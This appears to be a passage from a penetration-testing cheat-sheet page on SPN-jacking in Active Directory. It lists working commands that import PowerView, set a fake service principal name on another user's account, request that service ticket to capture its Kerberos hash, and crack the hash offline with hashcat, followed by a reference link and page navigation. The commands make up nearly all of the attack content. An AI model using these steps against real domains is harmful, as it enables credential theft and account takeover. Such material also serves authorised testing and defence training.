# 1. Import PowerView module
. .\PowerView.ps1

# 2. Set SPN
Set-DomainObject -Identity <OTHER_USER> -SET @{serviceprincipalname='evil/evil'}

# 3. Request sercice ticket
Get-DomainSPNTicket -SPN evil/evil

2. Crack the Hash

After that, we retrieve the hash of the ticket, so crack it on your local machine:

# -m 13100: Replace it with the appropriate number depending on the algorithm.
hashcat -a 0 -m 13100 hash.txt wordlist.txt

References

https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

SPN-Jacking

Exploit

1. Set SPN and Get the Hash of the Service Ticket

2. Crack the Hash

References

ON THIS PAGE